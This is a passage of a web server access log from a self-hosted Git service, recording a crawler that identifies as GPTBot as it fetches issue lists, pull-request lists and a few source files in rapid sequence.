"https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:08:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:08:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=open&type=all" -[17/Feb/2026:19:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:19:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:08:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:19:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:19:08:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:08:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:08:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md?display=source" [Client 74.7.227.38] [Length 11383] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:19:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg?display=rendered" [Client 74.7.227.38] [Length 10943] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:19:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:19:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:19:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:19:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15594] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:19:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:19:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:19:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?state=closed&type=all" [Client 74.7.227.38] [Length 9956] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" -[17/Feb/2026:19:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=open&type=all" -[17/Feb/2026:19:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:19:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:19:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9941] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:19:08:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=open&type=all" -[17/Feb/2026:19:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:19:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10081] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10254] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10083] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:08:37 